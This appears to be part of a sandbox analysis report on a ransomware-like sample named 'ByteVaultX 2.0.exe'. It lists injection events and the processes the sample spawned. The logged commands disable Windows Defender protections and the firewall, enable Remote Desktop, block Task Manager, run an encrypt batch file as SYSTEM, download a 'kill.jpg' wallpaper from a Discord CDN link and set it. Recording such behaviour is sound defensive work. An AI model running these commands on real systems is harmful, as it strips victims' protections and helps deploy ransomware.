N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2928 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2928 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe
PID 2408 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 1680 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2408 wrote to memory of 5572 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2408 wrote to memory of 5572 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\netsh.exe
PID 2408 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2408 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\SYSTEM32\runas.exe
PID 2408 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 4068 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 6112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 6112 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2408 wrote to memory of 5456 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 2408 wrote to memory of 5456 N/A C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe C:\Windows\system32\cmd.exe
PID 5456 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 5456 wrote to memory of 4380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 3096 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 4416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 4416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 4068 wrote to memory of 2384 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe

"C:\Users\Admin\AppData\Local\Temp\ByteVaultX 2.0.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\SYSTEM32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\SYSTEM32\runas.exe

runas /user:NT-AUTORITÄT\SYSTEM cmd.exe /c "C:\Encrypt\encrypt.bat"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument C:\Encrypt\encrypt.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa121846f8,0x7ffa12184708,0x7ffa12184718

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Encrypt\encrypt.bat" "

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2152 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2868 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2148,5292310798493132192,16021345772022231361,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1181543227728330774/1244072427731025991/skulls-light-halloween-red_1.jpg?ex=6653c83c&is=665276bc&hm=31de2cb652ccec56aca0b6ecf1e9b33fd01f18e5d5d2690e68e000f0c1477ee6&', 'C:\Users\Admin\Desktop\kill.jpg')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Start-Process 'C:\encrypt\encrypt.bat' -Verb RunAs"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\encrypt\encrypt.bat"

C:\Windows\system32\reg.exe

reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d ""C:\Users\Admin\Desktop\kill.jpg"" /f

C:\Windows\system32\rundll32.exe

RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters

C:\Windows\system32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections"

C:\Windows\system32\reg.exe

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr"

C:\Windows\system32\reg.exe

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "1" /f

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

C:\Windows\system32\netsh.exe

netsh firewall set opmode disable

C:\Windows\system32\netsh.exe

netsh firewall set opmode mode=DISABLE

C:\Windows\system32\netsh.exe

netsh advfirewall set currentprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile state off

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state off

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableRealtimeMonitoring $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableIOAVProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableScriptScanning $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableEmailProtection $true"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Set-MpPreference -DisableControlledFolderAccess $true"

